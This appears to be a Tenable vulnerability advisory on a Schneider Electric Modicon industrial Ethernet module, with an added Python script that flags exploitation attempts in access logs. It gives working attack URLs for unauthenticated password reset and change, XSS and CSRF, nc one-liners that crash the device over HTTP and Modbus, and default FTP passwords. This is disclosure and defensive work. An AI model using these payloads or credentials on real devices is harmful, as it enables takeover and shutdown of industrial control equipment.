Synopsis
Tenable found multiple vulnerabilities in the Schneider Electric Quantum Modicon 140 NOC 771 01 Ethernet Module.
CVE-2018-7809: Unauthenticated Password Reset
An unauthenticated remote attacker can delete the existing username and password for the HTTP server by visiting the following URL:
http://[ip]/unsecure/embedded/builtin?submit=Delete%20Password
This also has the side effect of resetting the web server username and password to the default USER/USER.
CVE-2018-7810: Reflected XSS
A reflected XSS vulnerability exists in the HTTP server's /goform/formTest endpoint. A remote attacker can insert JavaScript into the name parameter, and it will execute in the browser of whoever follows the link. An example follows:
http://[ip]/goform/formTest?name=<script>alert()</script>
CVE-2018-7811: Unauthenticated Password Change
The web server allows an authenticated remote user to change their own password via the /secure/embedded/builtin endpoint. The web server also lets an unauthenticated remote attacker change users' passwords via the /unsecure/embedded/builtin endpoint. An example URL that changes the admin user's password to evilpass follows:
http://[ip]/unsecure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User
CVE-2018-7830: Unauthenticated Remote Denial of Service
A denial of service occurs when an unauthenticated remote attacker sends an HTTP request with no "\r\n\r\n" terminator. This renders the web server useless for roughly one minute. The following is a one-line proof of concept:
echo -e "GET /index.htm HTTP/1.1\r\nHost: 192.168.248.30" | nc 192.168.248.30 80
CVE-2018-7831: Cross-site request forgery
The password change functionality is implemented with an HTTP GET request in which the new password is specified. An anti-forgery token is not required to validate the request. Furthermore, the current password does not need to be specified in order to complete a password change. An attacker can forge a link to be sent to an authenticated victim. Once clicked, the password will be changed. Example URL:
http://[ip]/secure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User
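Each of the HTTP issues above (CVE-2018-7809, -7810, -7811 and -7831) leaves a recognisable request line in the access log of a reverse proxy or IDS placed in front of the module. The following is an added detection example, not code from Tenable's advisory: it classifies Common Log Format lines against those issues. The log lines are constructed and the hosts and timestamps are hypothetical; CVE-2018-7830 is not covered because an unterminated request never produces a complete log entry.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Common Log Format, as a reverse proxy or IDS in
# front of the module might record them; hosts and timestamps are hypothetical.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Mar/2018:10:01:02 +0000] "GET /index.htm HTTP/1.1" 200 512
10.0.0.9 - - [01/Mar/2018:10:01:05 +0000] "GET /unsecure/embedded/builtin?submit=Delete%20Password HTTP/1.1" 200 210
10.0.0.9 - - [01/Mar/2018:10:01:09 +0000] "GET /unsecure/embedded/builtin?Language=English&user=admin&passwd=x&cnfpasswd=x&subhttppwd=Save+User HTTP/1.1" 200 210
10.0.0.12 - - [01/Mar/2018:10:02:00 +0000] "GET /goform/formTest?name=%3Cscript%3Ealert()%3C/script%3E HTTP/1.1" 200 300
10.0.0.3 - - [01/Mar/2018:10:03:00 +0000] "GET /secure/embedded/builtin?Language=English&user=admin&passwd=x&cnfpasswd=x&subhttppwd=Save+User HTTP/1.1" 200 210
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(method, target):
    """Map one request line to the advisory issue(s) it matches; [] if none."""
    parts = urlsplit(target)
    path = unquote(parts.path)      # normalise percent-encoding in the path
    query = parse_qs(parts.query)   # decodes %20 and '+' inside values
    hits = []
    if path == "/unsecure/embedded/builtin":   # unauthenticated endpoint: any use is suspect
        if query.get("submit") == ["Delete Password"]:
            hits.append("CVE-2018-7809")       # reset to default USER/USER
        elif "passwd" in query:
            hits.append("CVE-2018-7811")       # unauthenticated password change
        else:
            hits.append("unsecure-builtin-access")
    elif path == "/secure/embedded/builtin" and method == "GET" and "passwd" in query:
        hits.append("CVE-2018-7831")           # password change over GET, forgeable
    elif path == "/goform/formTest":
        for value in query.get("name", []):
            if "<" in value or "javascript:" in value.lower():
                hits.append("CVE-2018-7810")   # markup reflected via name=
                break
    return hits

def scan_log(text):
    """Return (source, timestamp, issues) for every request that matched."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                # not CLF; a real pipeline would count these
        issues = classify(m["method"], m["target"])
        if issues:
            findings.append((m["src"], m["ts"], issues))
    return findings
```

Calling scan_log(SAMPLE_LOG) returns one tuple per flagged request, so repeated hits from one source (10.0.0.9 above) can be correlated before the password is actually lost.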
Others
Tenable reported seven vulnerabilities to Schneider Electric. Schneider indicated that one of them (default accounts) was a duplicate and another (Modbus denial of service) was not a vulnerability. We have nevertheless decided to document both here.
Default FTP Accounts
We found a handful of default FTP accounts. Some of the passwords we used depend on the VxHash collision disclosed by H.D. Moore in 2010.
| Username | Password |
|---|---|
| sysdiag | factorycast@schneider |
| fdrusers | sresurdf |
| fwupgrade | FaAmU5p2F~ |
| loki | ZfTljublsx |
Modbus Denial of Service
Modbus is accessible over TCP port 502. Tenable found that the following unauthenticated remote Modbus message completely shuts down the Ethernet module:
echo -ne "\x0\xa8\x0\x0\x0\x5\x0\x5a\x0\x7\x0" | nc 192.168.238.30 502
Solution
No patches for these vulnerabilities exist. However, in their advisory, Schneider Electric advises customers to follow their Modicon Controllers Platform Cyber Security Reference Manual. They also recommend customers configure access control lists and "protect Modicon products with network, industrial, and application firewalls."
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]